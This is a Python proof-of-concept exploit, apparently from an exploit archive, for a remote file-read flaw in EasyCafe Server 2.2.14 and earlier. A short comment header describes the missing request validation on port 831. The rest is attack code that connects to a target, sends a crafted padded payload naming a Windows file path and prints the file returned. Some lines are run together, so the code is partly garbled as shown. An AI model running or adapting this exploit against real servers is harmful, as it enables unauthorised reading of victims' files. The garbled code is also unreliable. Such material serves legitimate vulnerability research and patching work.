#!/usr/bin/python -w# Title : EasyCafe Server <= 2.2.14 Remote File Read# Date : 25/12/2015# Author : R-73eN# Tested on : Windows 7 Ultimate# Software Link : http://www.tinasoft.com/easycafe/# Download Link: http://www.tinasoft.com/Download/easysetup.exe# Vulnerable Versions : EasyCafe Server <= 2.2.14# EasyCafe Server has a feature to upload file from the server to a client.# And the request is as following. EasyCafe Server sends an UDP request to the client with the file that wants to upload,# Then the client receives the packet and connects to the server on port 831 and sends the directory of the file and receives it.# The problem is that a remote attacker can connect to port 831 and can retrive a file becuase the server doesn't validate the request,# and does not check if it has sent the UDP request which gives us full Read access to the system.##EDB Note: Code my need some adjusting
import socket
#Banner
banner = ""
banner +="_________ __\n"
banner +=" |_ _|_ __/ _| ___/ ___| ___ _ __/ \| |\n"
banner +="| || '_ \| |_ / _ \| |_ / _ \ '_ \/ _ \ | |\n"
banner +="| || | | |_| (_) | |_| |__/ | | |/ ___ \| |___ \n"
banner +=" |___|_| |_|_|\___/ \____|\___|_| |_| /_/ \_\_____|\n\n"
print banner
IP = "192.168.43.36"# Target IP
PORT = 831
file_to_read = "C:\\Windows\\System32\\drivers\\etc\\hosts"# File to read
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((IP, PORT))
file_to_read = "\x43"+ file_to_read
hex_value = ''.join(x.encode('hex')for x in file_to_read)
fill = "\x00"end = "\x01\x00\x00\x00\x01"
payload = hex_value.decode("hex")+ fill *(261 - len(end)- len(file_to_read))+end
s.send(payload)
s.settimeout(0)
print "[+] Request Send Waiting for Response . . . [+]"try:
data = s.recv(261)# Get headerwhiledata:
data = s.recv(2048)
print data
except Exception:
print "[+] https://www.infogen.al/ [+]"finally:
s.close()
